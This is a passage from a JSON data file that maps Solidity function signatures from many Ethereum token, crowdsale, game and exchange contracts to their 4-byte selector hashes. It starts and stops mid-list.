"0x29e94ef6", "isActive()": "0x22f3e2d4", "activate()": "0x0f15f4c0", "randomSource()": "0x0c89b766", "INITIAL_SUPPLY()": "0x2ff2e9dc", "registerReferral(address,address)": "0x5603b9f9", "updateReferralBonusRate(uint256)": "0xe6678f33", "destroyRewards()": "0x7e25ac5b", "removeRewardToken(address)": "0x3d509c97", "addRewardToken(address,uint256)": "0x0e3802e9", "updateRewardRate(address,uint256)": "0xf0b3adee", "updateCodeWeight(string,uint256)": "0xeba74c0b", "addCode(string,uint256)": "0xb84c35b3", "updateRandom()": "0x645dbfd4", "getRandomUuid()": "0x13b37a83", "getUuid(uint256)": "0x2bf34e60", "GizerItems()": "0x9363933c", "updateBalances(address,address)": "0x6c6b23d2", "crowdsaleStart()": "0xcc3bb31a", "crowdsaleStop()": "0x52c700ea", "safeTokenWithdrawal(uint256)": "0x795ff8aa", "getBankermasterReq()": "0xfbf184c6", "getMyBanker()": "0x1b8d0e60", "getFreeBanker()": "0xfba9ecac", "becomeBankermaster()": "0xc3c503b7", "BankerFarmer()": "0xecff7531", "BENZCoin()": "0xd8211b0d", "setWithdrawalTime(uint256)": "0xb6af3643", "KVLToken()": "0x9229f3c1", "Burn(address,uint256)": "0xcc16f5db", "ConvertColouredBkp(address)": "0xd1e040ec", "ConvertBkp(uint256)": "0x4aeddad0", "Reward(address,uint256)": "0x619caafa", "SpecialRate(address,address,uint256,uint256)": "0xda979b8d", "SetRate(uint256)": "0x2640b401", "AuthSuspend(bool)": "0xbc0f920a", "AuthDapps(address,bool,int256,bool,bool)": "0xc291bf6d", "AuthAddr(address)": "0xf0cd58b7", "AuthAdmin(address,bool,uint256)": "0x6fb6fde6", "BlockPoints()": "0x26748804", "TOC()": "0xccbb41d0", "BLAINetworkToken()": "0x082bd485", "getEndICO()": "0x39a6ea72", "PiperToken()": "0x0eb944d5", "safeKill()": "0x058c5103", "getContribution()": "0xf10fdf5c", "initialize(uint256,address,uint256)": "0xfffb5183", "LeanFund()": "0xaf0e7ba3", "STR()": "0x2382534a", "changeCheckDate(bool,uint256,uint256)": "0xb5175571", "changeRateUSD(uint256)": "0xa3cc8b9c", "mintToSpecialFund(address)": "0xf7d9078e", "MCFitCrowdsale(uint256,uint256,uint256,address)": "0xd4d82dae", "withDraw(address)": "0x0a67d2c7", "changeAdvisor(address)": "0x3b1663be", "GCCToken()": "0xc7542f1d", "EarlyInvestorsTokensHolder(address,address,address)": "0x6b06548c", "g(address)": "0xcadaacbf", "PRICELESS()": "0x440d2ad0", "unsoldTokensBack()": "0x0d6103a1", "BTSCoin()": "0x4b12dd39", "initSale(address,address,address,address)": "0x3f64b318", "AleaPrivateSale(uint256,uint256,uint256,address,uint256,address)": "0xeca28cb7", "AleaCoin()": "0x32a71b36", "destory(uint256)": "0x908e049b", "exchange(address,uint256)": "0x045d0389", "calTotalSupply(uint256)": "0xdc242e38", "updateTotal(uint256)": "0x66c5cdf8", "removeCustomerService(address)": "0x4aeba1a5", "addCustomerService(address)": "0x802a350f", "setDestroyThreshold(uint256)": "0xedd27b8f", "setExchangeThreshold(uint256)": "0x56d1d4a2", "setExchangeLimit(uint256)": "0x8e3b4525", "setExchangeInterval(uint256)": "0x7593ca71", "GeneNuggetsToken()": "0xcd6f7c50", "Tom(uint256,string,uint8,string)": "0x5b6682aa", "updateCap(uint256)": "0xa7d68896", "RenCap()": "0x65227c7d", "CRAIC()": "0x4e304bfb", "calculateSetupAllowedUntil(address[16],uint256)": "0x1491858e", "calculateRegionSalePixelPrice(address[16],uint256)": "0xa46a96d9", "calculateRegionInitialSalePixelPrice(address[16],uint256)": "0xbc6ac112", "calculateAveragePixelPrice(address[16],uint256,uint256)": "0x0823b38d", "calculateMarketPixelPrice(address[16],uint256)": "0xd8c37ecd", "calculateCurrentMarketPixelPrice(address[16])": "0xe1437b00", "countPurchasedPixels(address[16])": "0x993b8cde", "calculateArea(address[16],uint256)": "0xa6948cd9", "BdpDataStorage(bytes8)": "0x5cef51a6", "setRegionPurchasedPixelPrice(uint256,uint256)": "0x84545ef8", "getRegionPurchasePixelPrice(uint256)": "0x4ce71fac", "getRegionUpdatedAtPurchasedAt(uint256)": "0x73c261f4", "setRegionPurchasedAt(uint256,uint256)": "0xd9ff94b7", "getRegionPurchasedAt(uint256)": "0xb219610a", "setRegionUpdatedAt(uint256,uint256)": "0x481d3bd5", "getRegionUpdatedAt(uint256)": "0x436fedc3", "setRegionBlockUpdatedAt(uint256,uint256)": "0xca8b39c8", "getRegionBlockUpdatedAt(uint256)": "0x7932f07f", "setRegionCurrentPixelPrice(uint256,uint256)": "0x517b1d8f", "getRegionCurrentPixelPrice(uint256)": "0x0500fe3e", "setRegionUrl(uint256,uint8[128])": "0xd30e2004", "getRegionUrl(uint256)": "0xacf0dd57", "setRegionNextImageId(uint256,uint256)": "0x285669e9", "getRegionNextImageId(uint256)": "0x36e73918", "setRegionCurrentImageId(uint256,uint256)": "0x557feee1", "getRegionCurrentImageId(uint256)": "0x230a1074", "setRegionCoordinates(uint256,uint256,uint256,uint256,uint256)": "0x39bef274", "getRegionCoordinates(uint256)": "0x42b4807a", "deleteRegionData(uint256)": "0xea107240", "getNextRegionId()": "0xd46d0393", "getLastRegionId()": "0xcb07b94b", "setSetupComplete()": "0xa951c994", "AlpenCash()": "0xd5630f71", "UWNToken(uint256,string,string,address)": "0xe11443cb", "ProofOfWeakFOMO()": "0xb4e8c036", "CoinX(uint256,string,string)": "0x8e46f716", "Tyzon()": "0x3ad55b83", "EthereumCare(uint256,string,uint8,string)": "0x9aa72320", "TelegramTON()": "0xcfcb69d1", "AthletiCoin(address,address)": "0x9476760d", "availableForWithdrawal(address,address)": "0x8a155171", "unpauseWithdrawal(address,address)": "0x12e8ebdf", "pauseWithdrawal(address,address)": "0xcdff1be4", "finishAllocation()": "0x331350ee", "freedWinPoolToWinSystem()": "0xfe8f4bbe", "balanceWinPoolToWinSystem()": "0x8e343516", "freedWinPoolToTeam()": "0x6e60cf61", "balanceWinPoolToTeam()": "0x08098336", "freedWinPoolForThirdStage()": "0x12bdc81b", "balanceWinPoolForThirdStage()": "0xf6d68fca", "freedWinPoolForSecondStage()": "0xfbb65708", "balanceWinPoolForSecondStage()": "0xf020f279", "Winchain()": "0x35db2b72", "registerBalanceForReference(address)": "0x6aec95cc", "withdrawICO(uint256)": "0xb02c8054", "currentRoundInformation()": "0xdfbb3036", "getPastRound(uint256)": "0xc0645011", "getRoundState()": "0x293c2958", "estimateNextPotSeedAmount()": "0x33a27f75", "blocksSinceLastBid()": "0x0b464bf6", "blocksRemaining()": "0xd0863580", "roundExpired()": "0xa2ce588d", "bid(uint256,string)": "0x0fc55fd1", "setNextBidExpireBlockLength(uint256)": "0xcd4e28b5", "setRollover(uint256)": "0x5008f699", "KingOfTheEthill()": "0x6526ecee", "DDAContract(address)": "0xa388a836", "LCEToken()": "0x434b349c", "TOT()": "0x69ff2d11", "regularEndGame(address,uint32,uint8,uint16,uint256,int256,uint256,address)": "0xc16b9374", "verifyCreateSig(address,uint256,uint256,bytes32,bytes)": "0xdba6f7be", "createGame(bytes32,uint256,uint256,bytes32,bytes)": "0xafc81953", "serverEndGameConflictImpl(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,bytes32,bytes32,uint256,address)": "0xc46d2235", "playerEndGameConflictImpl(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address)": "0x05ee72b5", "calcHash(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address)": "0x702b5f0b", "verify(bytes32,bytes,address,address)": "0xe8069e84", "verifySig(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address,bytes,address,address)": "0xd550172a", "safeSend(address,address)": "0x7af5878e", "payOut(address,uint128,int256)": "0x6e57e7e0", "setStakeRequirements(uint128,uint128)": "0xd6e5fe98", "SatoshiToken()": "0xe06c0fd2", "TRNDToken()": "0x2fbf6f73", "batch_transfer(address[],uint256[])": "0x833eccc5", "NBTV()": "0x14359466", "getGoldsSinceLastCollect(address)": "0xeb98c8d6", "getMyGolds()": "0x6cf32dde", "getMySword()": "0xb0705e44", "getFreeSword()": "0xea18e3d5", "calculateGoldBuySimple(uint256)": "0x60c6171c", "calculateGoldBuy(uint256,uint256)": "0x1bb8365f", "calculateGoldSell(uint256)": "0x6a0665a4", "buyGolds()": "0xecb46858", "sellGolds()": "0x4bd3af72", "upgradeSword(address)": "0xc768a4cd", "SwordMaster()": "0xd6e2bcb5", "liveEtherSportCampaign()": "0x90e8f758", "setOffer(address,uint256,uint256)": "0x098e8fc4", "buyTokensFor(address,address)": "0x910cbda6", "EtherSportCrowdsale(uint256,uint256,address,address,address)": "0xba780759", "PHILCOIN()": "0x9e0234a1", "ERC20Token(string,string,uint8,uint256,address,address)": "0xf040d973", "getImplementation()": "0xaaf10f42", "EnclavesDEXProxy(address,address,address,address,uint256,uint256,address,bytes32,bytes32)": "0xa29445a9", "StorageConsumer(address)": "0xd01d0175", "setWinner(uint256,bytes32,uint256,uint256,bytes32)": "0x490a6dac", "getPlayerAmount(uint256,uint256,address)": "0x6994a7a0", "getPlayerPlayInfo(uint256,uint256,uint256)": "0x957b2807", "getOptionInfo(uint256,uint256)": "0x93c434e5", "getGameWinner(uint256)": "0xfac20ab8", "newOption(uint256,uint256,bytes32,bytes32)": "0x312253ae", "getGameInfo(uint256)": "0x47e1d550", "getGameNum()": "0x6ea8efea", "newGame(bytes32,uint256,uint256,uint256)": "0x8a45242d", "GameTable()": "0x6756b1ae", "NodeHash()": "0xc8aafbc3", "finish(address)": "0x305ec69e", "CustomDealICO(uint256,uint256,uint256,address,uint256,uint256)": "0x8c0d6593", "externalCall(address,uint256,uint256,bytes)": "0xd33ca02b", "CM()": "0xc16ac06f", "KRWT_Token()": "0xf15cfe33", "setLockEndTime(uint256)": "0x0bd601df", "_isInWhiteAddresses(address)": "0x3139c691", "KPRToken()": "0x3d235d88", "CurrenXToken()": "0xea0d18b0", "Vasacoin()": "0x228b7bf8", "SUNX()": "0xcc130482", "FixedChain()": "0xb1fa884d", "ViteToken()": "0x36bcb4cd", "EPYCOIN()": "0xc9c1eded", "ScandinavianEKrona()": "0x79df896d", "PakistanRupee()": "0xc67979a5", "set_price(uint256)": "0x28bf794d", "createCoins(address)": "0xaaed31c7", "EternaCoinContract()": "0x15c1c5b8", "AK48Coin(uint256,string,string)": "0xa5b41c0e", "Amazon()": "0xc92d3ea9", "WHOMCrowdsale(address)": "0xf26bbde8", "KoaStandardToken(uint256,string,uint8,string)": "0xd77d3f79", "SPEKToken()": "0x57946a86", "validPrePurchase()": "0xa6117f39", "buySale(address)": "0x740907ea", "buyPresale(address)": "0x8bbb9fca", "BCTToken(uint256,string,string)": "0xff6d6f63", "numToWei(uint256,uint256)": "0x1a955061", "getPhaseAddress()": "0x4c5802c1", "finalizeIto(uint256,uint256,uint256)": "0xd8c3c1ed", "finalizePhase()": "0x5536deb6", "startPhase(uint256,uint256,uint256,uint256)": "0x301a9b09", "TTTTokenSell()": "0x0259371c", "HBToken(uint256,string,string,uint256)": "0xbf53dd15", "_0xDogecoin()": "0x298a49da", "HashTokenAward(uint256,string,string)": "0x773a8597", "SuperCarbonCoinToken()": "0xf4fd326c", "ARChain(uint256,string,string)": "0xde192a20", "updateCurrentBonusPeriod()": "0x291d1185", "initBonuses()": "0x41f59e81", "initBonusPeriod(uint256,uint256,uint256,uint256)": "0x13902e9f", "BonusPeriodFor(uint256)": "0x82cee91c", "BonusPeriodsCount()": "0x36bf094b", "WithBonusPeriods()": "0xbb4d9e22", "AssignWhitelistManager(address)": "0x8dc95182", "AddToWhiteList(address)": "0x16220188", "TRIPAGO()": "0x3992503d", "calculatePayoutForAddress(address)": "0x69e9ca8a", "startNewPayoutPeriod()": "0xe8ca1609", "isNewPayoutPeriod()": "0xb888a492", "setBlocksPerPayPeriod(uint256)": "0xf4c99177", "setMinimumWithdrawal(uint256)": "0xfc192fb0", "CrowdWallet(address,address,uint256)": "0x4557c70d", "ETHMCoin()": "0x4fb4f5a3", "HunterCoin()": "0x1da97f36", "NigeriavsArgentina()": "0x642e8271", "_0xBitcoincashToken()": "0x01659863", "GreatcoinERC20Token()": "0xc5d6a7f1", "StepVesting(address,uint256,uint256,uint256,uint256,uint256,uint256,bool)": "0xd63ebe92", "Krypticion()": "0xfe6cf9ee", "changeParameters(uint256[],uint256[],uint256[],uint256[])": "0xea304511", "enable(bool)": "0x4df68ada", "contractInfo()": "0x15c43aaf", "cutOf(uint256)": "0xf4b4d77e", "buy(uint256,string)": "0xb7dc3b18", "itemAt(uint256)": "0x544d9723", "Redeem()": "0xd95402e7", "soldItems()": "0xf513a671", "transferFromVest(uint256)": "0xd8c97f34", "finalizeCrowdsale(uint256,uint256,uint256)": "0x258b5c06", "finalizePrivatesale()": "0xd02e140a", "setTokenSaleAddress(address)": "0x5afe5207", "transferFromTokenSell(address,address,uint256)": "0x6323b526", "AnubisToken()": "0x98c39cc2", "mint(address,uint256,address,string)": "0x84ba2642", "_insertTokenMetadata(uint256,string)": "0xd41212c8", "_getOwnerTokenByIndex(address,uint256)": "0xae5d2cbe", "_getOwnerTokens(address)": "0xfe4520ad", "getFreeCHICKEN()": "0x01f78f43", "ChickenFarm()": "0x76e277c1", "GToken()": "0x5ae270aa", "changeICOState(bool,bool)": "0x38cdaab1", "transferAdmin(address,uint256)": "0x7fb33170", "REAL()": "0xf15732b8", "FSHN()": "0xb5d6cbfe", "buyPreICO()": "0xd603f872", "HurtleCoin()": "0xecad17c1", "setDolRate(uint256)": "0x579fea7d", "checkIcoStatus()": "0x12ffb59b", "NVBToken(uint256)": "0xa0b3bef0", "freezeAccount(address,address,bool)": "0x704f236c", "JadetToken()": "0x75a94af5", "mxrjjToken()": "0x7c709fbe", "updateMaxContribution(uint256)": "0x86b6f462", "updateMinContribution(uint256)": "0x4efd9e2c", "updateSaleLimit(uint256)": "0x414c377b", "VULToken()": "0xed6d8521", "Scaltinof()": "0xf94e45de", "CBX()": "0x366ba691", "setEFContract(address,address,uint256)": "0x93d22e52", "manualRaffle()": "0x3f900962", "EtherFlipRaffleToken()": "0x6d189422", "MISTT1()": "0x8a82a09d", "getFund(uint256)": "0x52c8df64", "continueSale()": "0xfee9ca13", "transferOPSPool()": "0x3e510870", "transferRewardPool()": "0x6418b903", "transferOVISBookedTokens()": "0xccf8bcf3", "transferTokenOPSPlatformTokens()": "0x72ef5458", "transferPresaleTokens()": "0xa0ec7f89", "changeStrategyAddress(address)": "0x922f7124", "changeTokenAddress(address,int256,address)": "0x5fffb7c7", "changeOVISReservedToken(uint256,int256)": "0x6b963f20", "bookOVISSale(uint256,uint256,int256)": "0x9e757e7f", "PricingStrategy()": "0xacab3e5d", "_removeOwner(address)": "0x9dc42f16", "holdSubscription(uint256)": "0x87a378fb", "cancelSubscription(uint256,uint256)": "0xdb72496f", "cancelSubscription(uint256)": "0x21235083", "createSubscription(uint256,uint256,uint256)": "0xb230642d", "onSubUnHold(uint256,address,bool)": "0x17cfde55", "onSubCanceled(uint256,address)": "0x16059170", "onSubNew(uint256,uint256)": "0x386741fa", "onSubExecuted(uint256)": "0x446e0b40", "onPayment(address,uint256,bytes)": "0x736c3e82", "SynixToken(uint256,string,uint8,string)": "0x4a8302a2", "PTLC()": "0xde1682a5", "Flow(uint256,string,string)": "0x7aa11238", "BsToken_STN()": "0xeddf3a48", "BsToken(string,string,uint256,address)": "0x0bd64dbf", "RGN()": "0x41db7e16", "CompositeCoinCrowdsale(uint256)": "0x578242c3", "releaseMintTokens()": "0x400b8bf8", "transferMintTokens(address,uint256)": "0x0d13d85e", "moveMintTokens(address,address,uint256)": "0x71e3fdc4", "totalMintSupply()": "0x85e0832c", "getMintingStatus()": "0x95a47652", "getMinted()": "0xac72200d", "manageMinting(bool)": "0xdd4aeb92", "isOperable(address)": "0x5b7450fc", "manageOperable(address,bool)": "0x0fb0a8d3", "vote_proposed_address(string,string)": "0x453aa450", "change_sale_address(address)": "0x33641775", "TomocoinTokens()": "0x547a5168", "addReceivers(address[],uint256[])": "0xa0378730", "SimpleDistributor()": "0x8c5a03bb", "TitaToken()": "0x8f42a864", "startSalePhase(uint256,uint256)": "0xda649c63", "allocateEcosystemTokens()": "0x901cea7b", "deliver(address,uint256,string)": "0x7241450c", "WallStreetCoin()": "0x45ec7670", "TAKCoin()": "0xb94e3516", "transferFounderTokens(address,uint256)": "0x0e698493", "transferMarketallocationTokens(address,uint256)": "0x35a3cfa0", "transferAdvisorsToken(address,uint256)": "0x975e76b3", "changeEnd(uint256)": "0xe37bddc3", "getVolumebasedBonusRate(uint256)": "0x6ad44174", "VendCrowdsale(uint256,uint256,uint256,address,uint256)": "0xbdced258", "IGCoin()": "0x9252e819", "_withdrawBonuses(bytes32,uint256)": "0x333432fe", "_getCalculationStartDate(bytes32)": "0x311551ad", "getDepositsAmountLeft(uint256)": "0x465d1cbe", "getTotalDepositsAmountLeft()": "0xd37194f5", "getBonusesAmountAvailable(bytes32,uint256)": "0x0bfd7b62", "getTotalBonusesAmountAvailable(bytes32)": "0x460b4a45", "withdrawBonuses(bytes32,uint256,address,uint256,address)": "0x928b792e", "removeDistributionSources(address[])": "0x64370755", "addDistributionSources(address[])": "0xcdd3ab58", "updateTreasury(address)": "0x7f51bb1f", "Profiterole(address,address,address)": "0x93da1db1", "_getTotalBmcDaysAmount(uint256,uint256)": "0xfb640453", "_getBmcDaysAmountForUser(bytes32,uint256,uint256)": "0x3686edc7", "_syncLockedDepositsAmount(bytes32)": "0xd6b92187", "_registerLockedDeposits(bytes32,uint256,uint256)": "0x1b7ccc3d", "_makeWithdrawForPeriod(bytes32,uint256)": "0x96de0c20", "_makeDepositForPeriod(bytes32,uint256,uint256)": "0xd8d736c5", "addDistributionPeriod()": "0xd927b5ad", "getTotalBmcDaysAmount(uint256)": "0x6047f7f5", "getLockedUserDeposits(bytes32)": "0xed6eba84", "getLockedUserBalance(bytes32)": "0xe38c35b6", "getUserBalance(bytes32)": "0xb6e9c2ac", "getSharesPercentForPeriod(bytes32,uint256)": "0x1fedbc03", "withdraw(bytes32,uint256,address,uint256,address)": "0x6cb24199", "deposit(bytes32,uint256,uint256,address,uint256)": "0xedce50de", "_emitOracleRemoved(address)": "0xce6c2589", "_emitOracleAdded(address)": "0xa9feca22", "removeOracles(address[])": "0x45644fd6", "addOracles(address[])": "0x205b931e", "MANHATTANPROXYPARKAVE()": "0x36bb9ffa", "OPTinToken()": "0x1f4dba8e", "restoreTokenOwnership()": "0xbcc44a72", "getTokenOwner()": "0xb7182b95", "removeFromPublicWhitelist(address)": "0x4b623178", "addToPublicWhitelist(address)": "0xc937da12", "contributeFor(address)": "0x10718655", "BreezeCoinICO()": "0xea95e4d8", "BreezeCoin()": "0xba457dd1", "sendDeposit()": "0x06cb4bcd", "ButtonClickGameContract()": "0x88e9d45d", "getClickMetadata(uint256)": "0x67b55bf9", "clickButton()": "0x3bd0a6e5", "setMinimumFee(uint256)": "0x182a7506", "setRequiredBlocksElapsedForVictory(uint256)": "0x3ccb25a2", "changeApprover(address)": "0xc6c599c1", "changeProposer(address)": "0x72d5fe21", "mintAllocation(address,uint256)": "0x01968a56", "approveMintLocked(address,uint256)": "0xf15b2bda", "approveMint(address,uint256)": "0x13b39b9c", "clearProposalLocked(address)": "0xdf305680", "clearProposal(address)": "0xc162bc03", "proposeMintLocked(address,uint256)": "0x22cf981d", "proposeMint(address,uint256)": "0x15d4c5d5", "exceedsSaleCap(uint256)": "0x2044b21b", "FML()": "0x839ff719", "mintAfterIcoPeriod()": "0x0d2a1fa7", "getAfterIcoPeriod(uint256)": "0x919c9d4a", "sharesOfScheme(uint256)": "0xeeae5e4d", "valueOfScheme(uint256)": "0xe8171f37", "sharesOfVault(uint256,address)": "0xb04287b3", "balanceOfVault(uint256,address)": "0xbcef393a", "valueOfVault(uint256,address)": "0xa56d1de3", "gainsOfVault(uint256,address)": "0x77169fbd", "creditVault(uint256,address,uint256)": "0x1ddb9105", "withdrawVault(uint256,address)": "0x2057420b", "flushVault(uint256,address)": "0xe946115b", "buyShares(uint256,address,uint256,uint256)": "0x954e8c2d", "BusinessAutomationUnion()": "0x0ecba3f8", "Lyfecoin()": "0x49fcea4a", "FDT(uint256,string,uint8,string)": "0x02502787", "transferA2B(address,address)": "0xf928655b", "_updateSaleAvgHistory(uint256,uint256)": "0xf3ce2bc6", "_cancelSale(uint256)": "0xce655952", "GetAssetTypeAverageSalePrice(uint256)": "0xd0a56299", "BuyAsset(uint256)": "0x00530933", "BuyCurrentTypeOfAsset(uint256)": "0xe4f3f47f", "GetCurrentTypeSaleCount(uint256)": "0xfebec059", "GetCurrentTypeSaleItem(uint256)": "0x85476d6e", "GetCurrentTypeStartTime(uint256)": "0x99dfa711", "GetCurrentTypeDuration(uint256)": "0x43f4cb4b", "GetCurrentTypeSalePrice(uint256)": "0x806b6c28", "GetCurrentSalePrice(uint256)": "0x7ff44544", "CancelSale(uint256)": "0x6ecd7b70", "BatchCancelSales(uint256[])": "0x8210f13b", "BatchCreateSaleAvgPrice(uint256[],uint256,uint256,uint256,uint64,address)": "0x2ab4672a", "CreateSaleAvgPrice(uint256,uint256,uint256,uint256,uint64,address)": "0xd7c61e7b", "BatchCreateSales(uint256[],uint256,uint256,uint64,address)": "0x80ac613f", "CreateSale(uint256,uint256,uint256,uint64,address)": "0x5569fc0b", "setAvgSalesCount(uint256)": "0x3688632e", "setNFTAddress(address,address)": "0xfd6e3bfe", "burnAsset(uint256)": "0x8f08d44d", "RequestDetachmentOnPause(uint256)": "0xe0e4704e", "BatchDetachAssets(uint256[10])": "0xf473c484", "BatchAttachAssets(uint256[10])": "0x8faab3a7", "AttachAsset(uint256)": "0x57623d59", "RequestDetachment(uint256)": "0x05c06367", "getTypeName(uint32)": "0xb3f936f2", "isAssetIdOwnerOrApproved(address,uint256)": "0xf84af7f3", "getAssetIdOwner(uint256)": "0x1a5d3b75", "getAssetIdOwnerIndex(uint256)": "0x673478c3", "getAssetIdOwnerAndOIndex(uint256)": "0xe88a728f", "getAssetIdCreator(uint256)": "0xa0cce3d2", "getIsNFTAttached(uint256)": "0xaca67a8f", "getAssetIdTypeSequenceId(uint256)": "0xd99929db", "getAssetIdItemType(uint256)": "0x1b87ccae", "getAssetRawMeta(uint256)": "0x1b728ed4", "getAssetDetailsURI(uint256)": "0xbfe8936c", "getAssetDetails(uint256)": "0xa1f24b3d", "setContractRegistry(address)": "0xfcd13d65", "convertForMultiple(address[],uint256[],uint256[],uint256[],address)": "0xb5cadc91", "convertForPrioritized2(address[],uint256,uint256,address,uint256,uint8,bytes32,bytes32)": "0x6b08f2ef", "getConnectorBalance(address)": "0xd8959512", "conversionsEnabled()": "0xbf754558", "getPurchaseReturn(address,uint256)": "0xa2c4c336", "CONVERTER_CONVERSION_WHITELIST()": "0x92d1abb7", "BANCOR_GAS_PRICE_LIMIT()": "0x9249993a", "BANCOR_NETWORK()": "0x9232494e", "getCrossConnectorReturn(address,address,uint256)": "0x8e3047e0", "CONTRACT_FEATURES()": "0x83315b6e", "registry()": "0x7b103999", "convert(address,address,uint256,uint256)": "0x75892cf1", "getSaleReturn(address,uint256)": "0x72b44b2c", "BANCOR_FORMULA()": "0x6d7bd3fc", "BANCOR_CONVERTER_FACTORY()": "0x5a46f06c", "disableConnectorPurchases(address,bool)": "0x514385be", "setConversionWhitelist(address)": "0x4af80f0e", "newManager()": "0x42906029", "withdrawFromToken(address,address,uint256)": "0x41a5b33d", "addConnector(address,uint32,bool)": "0x3f4d2fc2", "converterType()": "0x3e8ff43f", "convertInternal(address,address,uint256,uint256)": "0x2a2e2f0c", "quickConvertPrioritized(address[],uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x22742564", "BNT_TOKEN()": "0x1d000b61", "connectors(address)": "0x0e53aae9", "updateConnector(address,uint32,bool,uint256)": "0x0ca78923", "BANCOR_CONVERTER_UPGRADER()": "0x0c87355e", "UltraNote()": "0x325ad39b", "VioRewardERC20Token()": "0x776dba67", "wbcoin()": "0xe0945a80", "buyUpgrade()": "0xcb574b8c", "removeInWhiteList(address)": "0x3f9e9df2", "addInWhiteList(address)": "0x3447a7ef", "claimAllUnsold()": "0xff2a3776", "claimUnsold(uint256)": "0xa19e29a9", "SplendSale(uint128,uint128,uint128,uint128,uint256,uint256,uint128,uint128,uint128,uint128,address,address,address,address,address,address)": "0x3a447341", "wdivfloor(uint128,uint128)": "0x047c738e", "wmulfloor(uint128,uint128)": "0x68b670af", "finishExam()": "0x8ed7ca93", "forwardMoney()": "0x4e4cf65c", "changeURL(string)": "0xa0041286", "Mesut()": "0xd7f3c770", "OTCChain()": "0x72ad3c9f", "GennovaToken()": "0xff552482", "send(address,address[],uint256[])": "0xf8129cd2", "checkAccess(bytes32,address)": "0x3e1fd0da", "NebeusToken()": "0x0a7c1e9f", "AiEXToken()": "0x7ba3c804", "deductFromUnminted(uint256)": "0x8e611cee", "mintWithApproval(address,uint256,address)": "0x8d73c027", "getStackholderConfirmations(uint256)": "0x87881ede", "getStackholders()": "0xc0905fef", "getStackholderTransactionCount(bool,bool)": "0x66c2aa0e", "getStackholderConfirmationCount(uint256)": "0x3fc821ee", "addStackholderTransaction(address,bool)": "0x470b6e0e", "isConfirmedStackholder(uint256)": "0x5384734e", "executeStackholderTransaction(uint256)": "0xfc384b7c", "revokeStackholderConfirmation(uint256)": "0x43fd6b21", "confirmStackholderTransaction(uint256)": "0x7c236c3b", "submitStackholderTransaction(address,bool)": "0xc2664609", "_removeStackholder(address)": "0xacc58d24", "removeStackholder(address)": "0xfc5b57a6", "_addStackholder(address)": "0xaf09420b", "addStackholder(address)": "0xb0a254a7", "_preValidateRefill(address,uint256)": "0x8ddab3dc", "_safeApprove(address,uint256)": "0x57d55116", "_safeTransfer(address,address,uint256,bytes)": "0x24b6b8c0", "refillArray(address[],uint256[])": "0x679fecd6", "setBonus(address,uint256,bool)": "0x914980d4", "balanceWithoutFreezedBonus(address)": "0x0ecf19e5", "bonusOf(address)": "0x1283e328", "getTokenAmountBonus(uint256)": "0xb9c3395f", "_generateCode()": "0xc6c09252", "_getRate(uint256)": "0x9c0baa2d", "_getUtTotal()": "0x52cb36cd", "_getUt(address)": "0xe241e9c5", "_rewards(uint256,uint256)": "0x466339fb", "_bonusAll(uint256)": "0xdae7e05d", "_randomLucyAddr()": "0x12fc848e", "_bonusLucy(uint256)": "0xeebdff04", "shareBonus()": "0x96f9cffa", "setBonusParams(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x265c920f", "safeExit()": "0x82123075", "getAllBonus()": "0x4fb8843c", "getLucy()": "0x534e2645", "isExit()": "0xa2fe802b", "KentKoinToken()": "0x82173d11", "DurioTEST()": "0x786cf3ee", "getRoundInfo(uint256,uint256)": "0x8a9bb02a", "getRoundStageEndInfo(uint256)": "0x085ba55b", "getRoundPlayerList(uint256)": "0x0cd28e9d", "getLuckBoyAddrList()": "0xdf65d1ef", "winnerLast(uint256,uint256)": "0x0d9e8cab", "winnerFirst(uint256,uint256)": "0x8f9593f4", "Mehrancoin()": "0x6f96f269", "ADPOWER()": "0x097788d7", "OhNoToken()": "0x46405ffc", "getvalues()": "0x304a45c2", "setvalues(string,string,string,string,string,string)": "0xbf13633c", "TootyrToken()": "0xdab41935", "dist(address)": "0xfafcdc34", "sani()": "0x7ad53eae", "getRegulatorProxy(uint256)": "0x6ffa1ea7", "createRegulatorProxy(address)": "0x5b508cf0", "KekToken()": "0x8bd30ba1", "encode(address)": "0x34e24853", "recover(uint8,bytes32,bytes32,address)": "0xe3059cef", "test(uint8,bytes32,bytes32,address,address)": "0xa7d4549c", "calcTokenAmountByZWC(address,address,uint256)": "0x0d5e87f4", "ExchangeZWCToToken(address,address,uint256)": "0x94c0ac22", "KNOXV()": "0x1a0a9ac7", "setTxcode(uint256,uint256,uint256)": "0xb1ebcce1", "exchangeByBuyer(uint256,uint256)": "0xaf98cfd6", "ZoarToken()": "0x17f19efb", "HooyToken()": "0x3c6ea2a5", "SingularityTest23()": "0xc80e3e1e", "innocoinToken()": "0x65968727", "TYU(uint256,string,uint8,string)": "0x7ee54b82", "calculateLockedBalance(address)": "0x2bfacd62", "calculateLockedPercentage(uint8)": "0xf4e6d3f9", "removeAccountMilestone(address)": "0xe0389a47", "setAccountMilestone(address,uint8)": "0x58ec63bc", "addPolicy(uint8,uint256,uint8)": "0xd6699f48", "removePolicy(uint8,uint256)": "0xeb9af834", "getMilestoneInfo(uint8)": "0xca0d0d82", "addMilestone(uint8,uint256[],uint8[])": "0x1f8e728c", "distributeWithMilestone(address,uint256,uint8)": "0x6c00161a", "Diploma_landing_page()": "0xbb169da5", "MedSupplyToken()": "0x0fe7db9c", "FarziTokenSale()": "0x26aeba91", "stake(uint256,address,uint256)": "0x6e9c931c", "tokenRemain()": "0x42c7551e", "initPara(uint256,uint256,uint256,uint256,address,uint256,uint256)": "0xfd9e2120", "pairTransfer(address,uint256)": "0x38c4d4a6", "initPair(address)": "0xf4929cc5", "costoken()": "0xb17607e9", "generateUID(uint256,uint256,uint256,uint32)": "0xf4de8dfe", "test1(uint256)": "0x19ae8994", "setEth(uint256)": "0x144344b9", "setJotter(address)": "0xadadb11f", "setbonusTokens(uint256)": "0x4998ce40", "PPPC(uint256,string,uint8,string)": "0xeef3a0fa", "intelligentmasschainToken()": "0xa1410994", "_transferSignership(address)": "0x8afcf1c9", "OLDSPTI()": "0xa2f39dc6", "walletTimeOf(address)": "0xc3c59aa9", "claimReward(bytes)": "0x2cfbb031", "withdrawFee(bytes8)": "0xcbfba0e1", "USDto1ETH()": "0x3445679a", "messageSpanStep()": "0x4fc9584a", "ONO()": "0x2c8be60e", 